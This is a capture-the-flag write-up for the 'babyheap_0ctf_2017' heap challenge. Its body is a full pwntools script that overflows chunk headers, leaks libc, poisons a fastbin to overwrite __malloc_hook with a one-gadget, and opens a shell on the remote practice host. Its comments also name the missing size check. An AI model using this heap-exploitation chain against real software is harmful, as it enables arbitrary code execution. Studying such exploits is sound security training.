主体函数
我们可以发现，在 fill 里可以任意输入字节
接下来我们就利用 chunk extend 和 off-by-one
图片来自
https://bbs.pediy.com/thread-246786.htm
具体看exp
exp:
from pwn import *
#p=process('./babyheap_0ctf_2017')
# Target libc image. Loaded for reference only: `e` is not used anywhere
# further down in this script.
e = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
# Remote challenge instance (the local process() variant is commented out above).
p = remote('node3.buuoj.cn', 26497)
# Consume the first menu prompt before any wrapper sends a command.
p.recvuntil('Command:')
# Log every send/recv so the chain can be followed step by step.
context.log_level = 'debug'
def alloc(a):
    """Menu option 1: ask the target for a new chunk of *a* bytes.

    Note that, unlike update() and dele(), this wrapper does not consume the
    'Command:' prompt that follows (that read is intentionally left out).
    """
    p.sendline('1')
    p.recvuntil('Size:')
    p.sendline(str(a))
    # p.recvuntil('Command:') -- left out on purpose, see docstring
def update(a, b, c):
    """Menu option 2: write *b* bytes of *c* into the chunk at index *a*.

    *b* is passed through unchecked. The chain below depends on the target
    accepting a size larger than the chunk's own allocation (0x20 and 0x28
    bytes into a 0x18-byte chunk); bounding *b* by the recorded allocation
    size on the server side is what would stop it.
    """
    p.sendline('2')
    p.recvuntil('Index:')
    p.sendline(str(a))
    p.recvuntil('Size:')
    p.sendline(str(b))
    p.recvuntil('Content:')
    p.send(c)
    p.recvuntil('Command:')
def dele(a):
    """Menu option 3: free the chunk at index *a* and wait for the next prompt."""
    p.sendline('3')
    p.recvuntil('Index:')
    p.sendline(str(a))
    p.recvuntil('Command:')
def show(a):
    """Menu option 4: dump the chunk at index *a*.

    The response is left unread so the caller can parse it (the libc leak
    below reads it directly); the following 'Command:' prompt is not
    consumed either.
    """
    p.sendline('4')
    p.recvuntil('Index:')
    p.sendline(str(a))
# --- exploit chain (unchanged; comments added for readers) ---
# The only memory-corruption primitive used below is update(): its size is
# not bounded by the chunk's allocation, so the two calls that pass 0x20 and
# 0x28 bytes into a 0x18-byte chunk overrun into the neighbouring chunk
# header.  Everything else is ordinary glibc-2.23 heap bookkeeping.  On the
# target side, checking the update size against the recorded allocation size
# closes the whole chain; the oversized size argument is also the one thing
# a monitoring side would see on the wire.
alloc(0x18) #0
alloc(0x18) #1
alloc(0x68) #2
alloc(0x68) #3
# Overrun chunk 0 by 8 bytes: the trailing p64(0x91) replaces chunk 1's size
# field so chunk 1 appears to cover chunk 2 as well ("size1+size2").
update(0, 0x20, 'a'*0x18+p64(0x91)) #size1+size2
dele(1) #1 #free1 -- freed with the forged, enlarged size
alloc(0x18) #alloc1
# Chunk 2 is still allocated but now overlaps the freed region, so dumping
# it returns the fd/bk pointers the allocator stored there.
show(2) #fd, bk at alloc2
#gdb.attach(p)
# Read up to the first 0x7f byte, keep the last 6 bytes, zero-extend to 8 and
# subtract the hard-coded offset.  All three offsets below are specific to the
# libc-2.23 build loaded at the top of the script and are not portable.
libcbase = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 0x3c4b78
log.info(hex(libcbase))
# Address in the malloc-hook area that the later fake-chunk allocation returns.
malloc_hook = libcbase + 0x3c4aed
log.info(hex(malloc_hook))
one = libcbase + 0x4526a  # value written over the hook in the last update()
dele(2) #free2
#gdb.attach(p)
# Second overrun, this time through chunk 1: restore chunk 2's size (0x71)
# and point its fd at malloc_hook.
update(1, 0x28, 'a'*0x18+p64(0x71)+p64(malloc_hook)) #fd at 2->malloc_hook
#gdb.attach(p)
alloc(0x68) #2 -- first request gets chunk 2 back
#gdb.attach(p)
alloc(0x68) #4 at malloc_hook -- second request returns the fake chunk
#gdb.attach(p)
# 3 + 16 + 8 = 0x1b bytes of content; `one` lands in the final 8 bytes.
update(4, 0x1b, p8(2)*3+p64(2)*2+p64(one))
#gdb.attach(p)
alloc(255)  # presumably any further allocation now runs through the overwritten hook
p.interactive()